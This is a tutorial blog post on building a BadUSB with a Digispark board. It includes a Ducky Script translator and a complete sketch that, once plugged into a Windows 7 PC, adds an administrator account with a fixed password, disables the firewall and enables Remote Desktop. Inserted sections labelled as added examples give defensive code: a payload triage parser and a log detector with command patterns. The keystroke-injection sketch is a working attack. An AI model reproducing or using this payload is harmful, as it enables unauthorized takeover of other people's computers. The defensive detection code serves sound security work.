Introduction to BadUSB

An old friend of mine found a USB stick, was curious, plugged it into his PC, and his machine promptly "came online" for someone else. This silly but wonderful story made me want to learn how to build a BadUSB myself. To keep it practical, I bought a BadUSB board from Taobao, shown below.

In short: a piece of hardware is plugged straight into the target computer and makes it execute code, in order to control the host, steal information and so on (use your imagination).

Tools needed

A BadUSB_Rubber_Ducky board (the "rubber ducky")

The Arduino IDE, download: https://www.arduino.cc/en/Main/Software

The DPinst64 driver (pick the one matching your machine; most systems today are 64-bit)

Installing the tools

I won't cover installing Arduino; it is a point-and-click install: run the installer - Next - Finish!

When installing the DPinst64 driver, choose "Always trust software from Digistump LLC" - Install - Next - Finish!

Configuring the Arduino environment

First open Arduino - File - Preferences - Additional Boards Manager URLs:

http://digistump.com/package_digistump_index.json

Tools - Boards Manager - wait for it to finish downloading the index files:

Then, in the Type drop-down, pick the Contributed entry, select Digistump_AVR and install it. Once the install finishes you're done.

Finally pick the board type and programmer that match your board, then open one of the Keyboard example templates:

Writing the code

This is the bundled example sketch:

#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}


void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);

  // Type out this string letter by letter on the computer (assumes US-style
  // keyboard)
  DigiKeyboard.println("Hello Power_Liu");

  // It's better to use DigiKeyboard.delay() over the regular Arduino delay()
  // if doing keyboard stuff because it keeps talking to the computer to make
  // sure the computer knows the keyboard is alive and connected
  DigiKeyboard.delay(5000);
}

Upload and flash:

Prompt: Running Digispark Uploader…Plug in device now… (will timeout in 60 seconds)

At this point you have 60 seconds to plug in your BadUSB:

The prompt "Micronucleus done. Thank you!" means the upload succeeded. From now on, whenever the BadUSB is plugged in it keeps typing Hello Power_Liu until it is unplugged:

Step by step: writing a "Hello Hacker!"

1. First write our script in Notepad and save it as hacker.txt:

REM This script opens cmd and then prints Hello Hacker!
DELAY 5000
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
ENTER
DELAY 1000
STRING Hello Hacker!
DELAY 1500
ENTER
ENTER

2. Use our Python conversion script to turn hacker.txt into an .ino file:

Duckyspark_translator.py hacker.txt hacker

Source of the Python conversion script:

# -*- coding:utf-8 -*-
# Duckyspark translator: turns a Ducky Script text file into a Digispark
# (DigiKeyboard) Arduino sketch.
# Usage: python Duckyspark_translator.py [payload.txt] [output_name]

from __future__ import print_function
import sys

l = '//'          # Ducky Script line currently being translated
mod_input = ''    # modifier word to strip from the line (ALT / CTRL / CONTROL)
mod_output = ''   # DigiKeyboard modifier constant to emit for it


def translate_keys(s):
    """Map Ducky key names in s to DigiKeyboard key constants.

    Letters appear as ' a', ' b', ... (the argument of a modifier combo),
    so the leading space is part of the pattern.
    """
    for c in 'abcdefghijklmnopqrstuvwxyz':
        s = s.replace(' ' + c, 'KEY_' + c.upper())

    # 1-0 if needed

    # F1-F12: F10-F12 first so that ' F1' cannot eat the prefix of ' F10'
    for n in (10, 11, 12, 1, 2, 3, 4, 5, 6, 7, 8, 9):
        s = s.replace(' F%d' % n, 'KEY_F%d' % n)

    # arrows: normalise the long spelling first, then map each name once
    # (mapping LEFTARROW and then LEFT separately would replace twice)
    for long_name, short_name in (('LEFTARROW', 'LEFT'), ('RIGHTARROW', 'RIGHT'),
                                  ('UPARROW', 'UP'), ('DOWNARROW', 'DOWN')):
        s = s.replace(long_name, short_name)
    for name in ('LEFT', 'RIGHT', 'UP', 'DOWN'):
        s = s.replace(name, 'KEY_ARROW_' + name)
    return s


def replacement():
    """Emit a standalone key (or a CTRL ALT combo) as one DigiKeyboard call."""
    s = translate_keys(l)
    s = (s.replace('PRINTSCREEN', 'sendKeyStroke(KEY_PRT_SCR')
          .replace('TAB', 'sendKeyStroke(KEY_TAB')
          .replace('SPACE', 'sendKeyStroke(KEY_SPACE')
          .replace('CONTROL ALT', 'sendKeyStroke(MOD_ALT_RIGHT,')
          .replace('CTRL ALT', 'sendKeyStroke(MOD_ALT_RIGHT,')
          .replace('ESCAPE', 'sendKeyStroke(KEY_ESC')
          .replace('ENTER', 'sendKeyStroke(KEY_ENTER'))
    if s.startswith('KEY_ARROW_'):      # a bare arrow key also needs the call
        s = 'sendKeyStroke(' + s
    print('DigiKeyboard.' + s + ');')


def modreplacement():
    """Emit a modifier combo (ALT x, CTRL x, ...) as sendKeyStroke(KEY, MOD)."""
    s = translate_keys(l.replace(mod_input, ''))
    s = (s.replace('PRINTSCREEN', 'KEY_PRT_SCR')
          .replace('TAB', 'KEY_TAB')
          .replace('ESCAPE', 'KEY_ESC')
          .replace('SPACE', 'KEY_SPACE')
          .replace('ENTER', 'KEY_ENTER')
          .replace(' ', ''))
    print('DigiKeyboard.sendKeyStroke(' + s + ',' + mod_output + ');')


# arguments: [input file] [output name without .ino]
if len(sys.argv) > 3:
    print('Too many arguments')
    sys.exit(1)
in_name = sys.argv[1] if len(sys.argv) >= 2 else 'payload.txt'
out_name = sys.argv[2] + '.ino' if len(sys.argv) == 3 else 'digipayload.ino'
try:
    with open(in_name, 'r') as payload_input:
        lines = payload_input.read().splitlines()
except IOError:
    print('\nError! File "' + in_name + '" does not exist!\n')
    sys.exit(1)
sys.stdout = open(out_name, 'w')

# --------------------------------------
# Digispark program fragment
print('//www.liuwx.cn&Qq211124332')
print('#include "DigiKeyboard.h"')
print('#define KEY_ESC 41')
print('#define KEY_BACKSPACE 42')
print('#define KEY_TAB 43')
print('#define KEY_PRT_SCR 70')
print('#define KEY_DELETE 76\n')

print('void setup() {\n')
# Windows can take a while to enumerate the Digispark, so wait 5 s instead of 0.5 s
print('DigiKeyboard.delay(5000);')
print('DigiKeyboard.sendKeyStroke(0);')
# ---------------------------------------

for l in lines:
    if len(l) < 1:
        continue

    if 'REM' in l:
        print('//', l)

    elif 'DELAY' in l:
        print('DigiKeyboard.' + l.replace('DELAY', 'delay(').replace(' ', '') + ');')

    elif 'STRING' in l:
        # quotes and backslashes inside the text are typed via char(34) / char(92)
        body = (l.replace('"', '")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("')
                 .replace('\\', '")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("')
                 .replace('STRING ', 'print(F("'))
        print('DigiKeyboard.' + body + '"));')

    elif l in ('GUI', 'WINDOWS', 'CONTROL ESCAPE'):
        print('DigiKeyboard.sendKeyStroke(KEY_ESC,MOD_CONTROL_LEFT);')

    elif l in ('GUI d', 'WINDOWS d'):
        print('DigiKeyboard.sendKeyStroke(KEY_D,MOD_GUI_LEFT);')

    elif l in ('WINDOWS r', 'GUI r'):
        print('DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);')

    elif 'MENU' in l:
        print('DigiKeyboard.sendKeyStroke(MOD_GUI_RIGHT);')

    # modifier combos: the two-modifier form must be tested before the single ones
    elif 'CTRL ALT' in l:
        replacement()
    elif 'ALT' in l:
        mod_input, mod_output = 'ALT', 'MOD_ALT_RIGHT'
        modreplacement()
    elif 'CTRL' in l:
        mod_input, mod_output = 'CTRL', 'MOD_CONTROL_LEFT'
        modreplacement()
    elif 'CONTROL' in l:
        mod_input, mod_output = 'CONTROL', 'MOD_CONTROL_LEFT'
        modreplacement()

    else:
        replacement()

# Digispark program fragment
print('\n}')
print('\n')
print('void loop() {\n')
print('}\n')
# -----------------------------------

sys.stdout.close()

After the conversion there is a hacker.ino file in the current directory:

Opened, the generated sketch looks like this:

//www.liuwx.cn&Qq211124332
#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76

void setup() {

  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print(F("cmd"));
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print(F("Hello Hacker!"));
  DigiKeyboard.delay(1500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() {

}

3. Upload the sketch: plug in the BadUSB when prompted to flash the program:

After a successful upload it performs our actions automatically and prints Hello Hacker! on the screen.
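The three steps above turn a Ducky Script text file into keystrokes. The following added example (written for this edit; it is not part of the original post or of the Duckyspark translator) goes the other way, for someone who finds such a file: it parses a Ducky Script payload like hacker.txt above, reconstructs what the device would type and on what timeline, and flags typed text that matches a small constructed list of command fragments worth a closer look. The sample payload, the indicator list and all function names are assumptions of this example.

```python
# Added example (not from the original post or the Duckyspark translator):
# a Ducky Script parser for triage. It types nothing; it reports what a
# payload would type and when, so a responder can read a found .txt quickly.
from __future__ import annotations
from dataclasses import dataclass

# Constructed sample: the hacker.txt payload from the article.
SAMPLE_PAYLOAD = """REM This script opens cmd and then prints Hello Hacker!
DELAY 5000
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
ENTER
DELAY 1000
STRING Hello Hacker!
DELAY 1500
ENTER
ENTER
"""

# Fragments of typed text worth a second look (constructed list, extend as needed).
SUSPICIOUS = ("net user", "net localgroup", "netsh ", "reg add", "powershell", "certutil")

MODIFIERS = ("GUI", "WINDOWS", "CTRL", "CONTROL", "ALT", "SHIFT", "COMMAND")


@dataclass
class Event:
    t_ms: int     # milliseconds since the device enumerated (sum of DELAYs so far)
    kind: str     # "comment", "string", "combo" or "key"
    detail: str


def parse_ducky(text: str) -> tuple[list[Event], int]:
    """Return the events of a Ducky Script and its total scripted delay in ms."""
    events: list[Event] = []
    clock = 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "REM":
            events.append(Event(clock, "comment", arg))
        elif cmd == "DELAY":
            if not arg.isdigit():
                raise ValueError(f"line {lineno}: DELAY needs an integer, got {arg!r}")
            clock += int(arg)
        elif cmd == "STRING":
            events.append(Event(clock, "string", arg))
        elif cmd in MODIFIERS:
            events.append(Event(clock, "combo", cmd + ("+" + arg if arg else "")))
        else:
            events.append(Event(clock, "key", line))
    return events, clock


def typed_text(events: list[Event]) -> str:
    """What lands in the focused window: STRING text with ENTER as a newline."""
    parts = []
    for e in events:
        if e.kind == "string":
            parts.append(e.detail)
        elif e.kind == "key" and e.detail == "ENTER":
            parts.append("\n")
    return "".join(parts)


def triage(text: str) -> dict:
    """Summarise a payload: size, scripted run time, typed text, flagged fragments."""
    events, total_ms = parse_ducky(text)
    typed = typed_text(events)
    return {
        "events": len(events),
        "runtime_ms": total_ms,
        "opens_run_dialog": any(e.kind == "combo" and e.detail in ("GUI+r", "WINDOWS+r")
                                for e in events),
        "typed": typed,
        "flags": sorted(s.strip() for s in SUSPICIOUS if s in typed.lower()),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PAYLOAD).items():
        print(f"{key}: {value!r}")
```

For hacker.txt the summary shows eight events, 8.5 s of scripted delay, a Run dialog, and nothing flagged; the same function run over the payload from the later section of this article would flag net user, net localgroup, netsh and reg add. The scripted delay is a lower bound on run time, since the translated sketch adds its own start-up delay before the first line.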

Plugging in the USB stick to break into a Win7 machine on the LAN and log into its Remote Desktop

I originally wanted to write up MSF + BadUSB reverse shells for Win7 and Win10, but that is already on Baidu, so there's no need to repeat it in this article!

Idea and main steps

1. There is a Win7 PC on the LAN

2. Plug in the BadUSB and turn off the Win7 firewall

3. Create a user HACKER and elevate it to administrator

4. Enable 3389 on Win7

5. From another machine on the LAN, log into the Win7 desktop with mstsc

Command notes

Command to disable the firewall: netsh firewall set opmode mode=disable

Command to enable 3389 on Win7: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

As for why some letters in the 3389 command above are uppercase and some lowercase:

reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F

Because when the BadUSB is plugged in it presses Caps Lock first and only then runs the commands, in case the machine has a Chinese input method active! That's why the statement above has to be written this way: lowercase letters come out as uppercase in the DOS window, and uppercase ones come out as lowercase!

Press Enter: DigiKeyboard.sendKeyStroke(KEY_ENTER);

Wait 2 seconds before the next step (a shorter delay sometimes makes execution fail): DigiKeyboard.delay(2000);

The code is attached below:

//www.liuwx.cn QQ211124332

#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76
#define KEY_CAPS_LOCK 0x39

void setup() {

  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
  DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
  DigiKeyboard.delay(500);
  DigiKeyboard.print(F("cmd"));
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print(F("color c"));
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(200);
  DigiKeyboard.print(F("net user hacker Qliuwx123@ /add"));
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(300);
  DigiKeyboard.print(F("net localgroup administrators hacker /add"));
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.print(F("netsh firewall set opmode mode=disable")); // disable the firewall
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print(F("reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F")); // enable 3389
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() {

}
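The sketch above types a short, fixed sequence into cmd: add a local user, put it in Administrators, disable the firewall, set fDenyTSConnections to 0. Each of those steps leaves a host telemetry record, and they all land within seconds of a new HID keyboard enumerating, far faster than a person types. The following added example (not from the original post) correlates such records: it reads constructed sample log lines shaped like Windows Security events 4720, 4732 and 4950 and Sysmon events 1 and 13, and reports a finding when several of the indicators occur within a short window after a keyboard arrival. The log lines, the Kernel-PnP arrival record and its event ID, the pipe-delimited field layout and the function names are constructed for this example. Matching is case-insensitive, so the inverted-case trick from the command notes changes nothing for the detector: the command line that actually executes is what gets logged.

```python
# Added example (not from the original post): correlate host telemetry to spot
# a keystroke-injection device performing the sequence the article describes.
# Record shapes approximate Windows Security (4720, 4732, 4950) and Sysmon
# (1 = process create, 13 = registry value set); the lines are constructed.
from datetime import datetime, timedelta
import re

# Constructed sample telemetry, one record per line: time|source|event_id|message.
# The Kernel-PnP arrival record and its ID are illustrative placeholders.
SAMPLE_LOG = r"""
2023-01-01T10:00:00|Kernel-PnP|20001|Device HID\VID_XXXX&PID_XXXX\7&1 installed: HID Keyboard Device
2023-01-01T10:00:02|Sysmon|1|Image: C:\Windows\System32\cmd.exe ParentImage: C:\Windows\explorer.exe CommandLine: cmd
2023-01-01T10:00:04|Sysmon|1|Image: C:\Windows\System32\net.exe CommandLine: net user hacker ******** /add
2023-01-01T10:00:04|Security|4720|A user account was created. Account Name: hacker
2023-01-01T10:00:05|Sysmon|1|Image: C:\Windows\System32\net.exe CommandLine: net localgroup administrators hacker /add
2023-01-01T10:00:05|Security|4732|A member was added to a security-enabled local group. Group Name: Administrators
2023-01-01T10:00:06|Sysmon|1|Image: C:\Windows\System32\netsh.exe CommandLine: netsh firewall set opmode mode=disable
2023-01-01T10:00:06|Security|4950|A Windows Firewall setting has changed. Setting: Operational mode
2023-01-01T10:00:07|Sysmon|13|TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections Details: DWORD (0x00000000)
2023-01-01T11:30:00|Sysmon|1|Image: C:\Windows\System32\cmd.exe ParentImage: C:\Windows\explorer.exe CommandLine: cmd
"""

# Command-line patterns, case-insensitive: what executes is logged in its real
# case whatever case the device typed.
COMMAND_INDICATORS = {
    "local_user_added": re.compile(r"net\s+user\s+\S+\s+\S+\s+/add", re.I),
    "added_to_admins": re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add", re.I),
    "firewall_disabled": re.compile(
        r"netsh\s+(advfirewall|firewall)\s+set\s+.*\b(opmode\s+mode=disable|state\s+off)", re.I),
    "rdp_enabled": re.compile(r"fDenyTSConnections\b.*(\(0x0+\)|/d\s+0\b)", re.I),
}
# Security event IDs that corroborate the same steps.
EVENT_ID_INDICATORS = {"4720": "local_user_added", "4732": "added_to_admins",
                       "4950": "firewall_changed"}


def parse_log(text):
    """Split the pipe-delimited sample into (time, source, event_id, message)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, source, event_id, message = line.split("|", 3)
        records.append((datetime.fromisoformat(ts), source, event_id, message))
    return records


def keyboard_arrivals(records):
    """Times at which a new HID keyboard enumerated."""
    return [ts for ts, source, _, message in records
            if source == "Kernel-PnP" and "keyboard" in message.lower()]


def detect(records, window_s=60, min_indicators=2):
    """Flag a keyboard arrival followed by >= min_indicators distinct steps within window_s."""
    findings = []
    for t0 in keyboard_arrivals(records):
        deadline = t0 + timedelta(seconds=window_s)
        hits = {}  # indicator name -> first time seen
        for ts, _, event_id, message in records:
            if not t0 <= ts <= deadline:
                continue
            for name, pattern in COMMAND_INDICATORS.items():
                if pattern.search(message):
                    hits.setdefault(name, ts)
            if event_id in EVENT_ID_INDICATORS:
                hits.setdefault(EVENT_ID_INDICATORS[event_id], ts)
        if len(hits) >= min_indicators:
            findings.append({
                "device_at": t0.isoformat(),
                "indicators": sorted(hits),
                "span_s": (max(hits.values()) - t0).total_seconds(),
            })
    return findings


if __name__ == "__main__":
    for finding in detect(parse_log(SAMPLE_LOG)):
        print(finding)
```

On the sample the detector reports one finding: five distinct indicators within seven seconds of the keyboard arriving. The lone cmd.exe launch ninety minutes later produces nothing, and shrinking the window to three seconds also produces nothing, which is the knob to tune against how quickly a real user could plausibly type the same commands.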

A demo of the actual effect is on Bilibili:

Plugging in the USB stick to enable 3389 on Win7, disable the firewall and log into its Remote Desktop

Closing

This article is mostly about giving myself a first understanding of Arduino and the hardware side, as a base for deeper study later. It is my first look at the Arduino Rubber_Ducky; corrections from the experts are welcome.

A quick plug: I recently registered a WeChat public account, 漏洞知识库; feel free to follow it!
